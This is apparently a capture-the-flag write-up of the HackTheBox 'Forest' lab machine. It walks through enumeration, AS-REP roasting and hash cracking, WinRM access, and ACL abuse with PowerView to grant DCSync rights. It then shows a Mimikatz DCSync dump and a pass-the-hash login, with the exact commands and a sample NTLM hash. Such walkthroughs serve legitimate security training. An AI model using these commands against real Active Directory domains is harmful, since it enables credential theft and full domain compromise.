image12

Forest is an easy box on the HacktheBox platform, featuring RID brute forcing, Kerberos AS-REProasting attacks, remote access using the WinRM protocol, privilege escalation through Active Directory ACL abuse, and finally DCSync attacks.

Enumeration

We start off with a nmap scan, using default scripts (-sC), and the enumerating versions flags (-sV).

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 08:29 CST
Nmap scan report for 10.10.10.161
Host is up (0.061s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-12 14:36:32Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-12-12T06:36:42-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h46m39s, deviation: 4h37m09s, median: 6m37s
| smb2-time: 
|   date: 2023-12-12T14:36:39
|_  start_date: 2023-12-11T01:44:33
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.32 seconds

By this nmap scan, we can see that that this machine is an Active Directory Domain Controller. We can attempt to enumerate Domain user accounts if SMB anonymous bindings are enabled. So we run enum4linux.

Untitled-1

We aquire quite a few users from enum4linux, which we can use to leverage an attack.

Exploitation

We can build a wordlist of Domain usernames to test if accounts are ASREP-Roastable. An ASREPRoasting attack leverages an accounts lack of Kerberos pre-authentication required, giving us the users hash.

We can build the text file users.txt like so:

sebastien
lucinda
svc-alfresco
andy
mark
santi
zeus

and utilize it in an ASREPRoasting attack with impacket-GetNPUsers:

image

We get a hash for the user svc-alfresco! The naming convention svc indicates a service account, meaning potentially more privilege being given to this account.

We can then attempt to crack the hash using hashcat, with the command: hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule:

image

Boom! We cracked the service account hash! Great, now due to the WinRM service running on port 5985 that we enumerated earlier with nmap, we could potentially gain command execution if the service user is in the local group “Remote Management Users”.

image

We get command execution!

Privilege Escalation

As a Domain user, or a service account, I like to execute BloodHound on the target the enumerate potential domain vulnerabilities like Kerberoasting, or permission misconfiguration.

We find that the Domain Group Account Operators as Generic All access on zeus, and svc-alfresco is a part of the Privileged Accounts Domain Group, and the Privileged Accounts Domain Group is a member of the Account Operators Group. Because of this, our current user has full control over the user zeus. We can change their password, set them apart from the Remote Management Users to get RCE, then give them DCSync rights.

image

image

net localgroup "Remote Management Users" htb.local\zeus /add

Utilize PowerView to give Zeus DCSync rights

. .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zeus', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity htb.local -PrincipalIdentity zeus -Rights DCSync

Then we can use Evil-WinRM once more to gain access to the zeus account

image

We can then use Mimikatz to preform the DCSync procedure as zeus.

Mimikatz.exe "lsadump::dcsync /domain:htb.local /user:Administrator" "exit"

image

And we’ve gathered the NTLM hash of the Administrator, we can use this to Pass the Hash (PtH) to the Domain Administrator with evil-winrm.

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6